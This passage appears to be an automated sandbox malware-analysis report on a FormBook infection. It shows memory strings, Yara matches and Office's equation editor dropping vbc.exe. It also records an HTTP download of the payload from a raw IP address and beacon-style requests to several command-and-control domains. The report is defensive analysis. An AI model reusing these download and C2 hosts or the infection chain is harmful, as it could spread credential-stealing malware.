Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.661607475.00000000042B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.485622386.0000000006A09000.00000004.00000001.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484209612.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476939391.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A725389E.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.noyoucantridemyonewheel.com

Source: global traffic	HTTP traffic detected: GET /90009/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.229.133Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.noyoucantridemyonewheel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.deboraverdian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.franquiciasexclusivas.tiendaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.hacticum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.trashwasher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 18:27:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown	TCP traffic detected without corresponding DNS query: 107.173.229.133

Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E6310	4_2_001E6310
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E6300	4_2_001E6300
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E1DE0	4_2_001E1DE0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041C130	9_2_0041C130
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041C9A5	9_2_0041C9A5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041BABE	9_2_0041BABE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00408C7B	9_2_00408C7B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041C4E6	9_2_0041C4E6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00408C80	9_2_00408C80
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D87	9_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C5E0C6	9_2_00C5E0C6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C63040	9_2_00C63040
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C7905A	9_2_00C7905A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CDD06D	9_2_00CDD06D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C8D005	9_2_00C8D005
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CED13F	9_2_00CED13F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C5E2E9	9_2_00C5E2E9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D01238	9_2_00D01238
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C5F3CF	9_2_00C5F3CF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C863DB	9_2_00C863DB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D063BF	9_2_00D063BF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C67353	9_2_00C67353
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CAA37B	9_2_00CAA37B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C62305	9_2_00C62305
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C95485	9_2_00C95485
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C71489	9_2_00C71489
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C9D47D	9_2_00C9D47D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CE443E	9_2_00CE443E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D035DA	9_2_00D035DA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CE05E3	9_2_00CE05E3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C7C5F0	9_2_00C7C5F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CA6540	9_2_00CA6540
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C6351F	9_2_00C6351F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C6E6C1	9_2_00C6E6C1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C64680	9_2_00C64680
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D02622	9_2_00D02622
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CAA634	9_2_00CAA634
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C957C3	9_2_00C957C3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CE579A	9_2_00CE579A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C6C7BC	9_2_00C6C7BC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CF771D	9_2_00CF771D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CDF8C4	9_2_00CDF8C4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CFF8EE	9_2_00CFF8EE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C6C85C	9_2_00C6C85C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C8286D	9_2_00C8286D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C769FE	9_2_00C769FE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CF49F5	9_2_00CF49F5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D0098E	9_2_00D0098E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C629B2	9_2_00C629B2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CE394B	9_2_00CE394B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CE5955	9_2_00CE5955
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D13A83	9_2_00D13A83
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CE6BCB	9_2_00CE6BCB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C5FBD7	9_2_00C5FBD7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CEDBDA	9_2_00CEDBDA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D0CBA4	9_2_00D0CBA4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C87B00	9_2_00C87B00
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00D02C9C	9_2_00D02C9C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CEAC5E	9_2_00CEAC5E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00CFFDDD	9_2_00CFFDDD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C6CD5B	9_2_00C6CD5B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C90D3B	9_2_00C90D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A3E0C6	12_2_00A3E0C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A6D005	12_2_00A6D005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A43040	12_2_00A43040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A5905A	12_2_00A5905A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A3E2E9	12_2_00A3E2E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AE1238	12_2_00AE1238
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A3F3CF	12_2_00A3F3CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A663DB	12_2_00A663DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A42305	12_2_00A42305
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A8A37B	12_2_00A8A37B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A47353	12_2_00A47353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A75485	12_2_00A75485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A51489	12_2_00A51489
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A7D47D	12_2_00A7D47D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A5C5F0	12_2_00A5C5F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A4351F	12_2_00A4351F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A86540	12_2_00A86540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A44680	12_2_00A44680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A4E6C1	12_2_00A4E6C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AE2622	12_2_00AE2622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A4C7BC	12_2_00A4C7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AC579A	12_2_00AC579A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A757C3	12_2_00A757C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00ADF8EE	12_2_00ADF8EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A6286D	12_2_00A6286D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A4C85C	12_2_00A4C85C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A429B2	12_2_00A429B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AE098E	12_2_00AE098E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A569FE	12_2_00A569FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AC5955	12_2_00AC5955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AF3A83	12_2_00AF3A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00AECBA4	12_2_00AECBA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A3FBD7	12_2_00A3FBD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00ACDBDA	12_2_00ACDBDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A67B00	12_2_00A67B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00ADFDDD	12_2_00ADFDDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A70D3B	12_2_00A70D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A4CD5B	12_2_00A4CD5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A72E2F	12_2_00A72E2F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A5EE4C	12_2_00A5EE4C
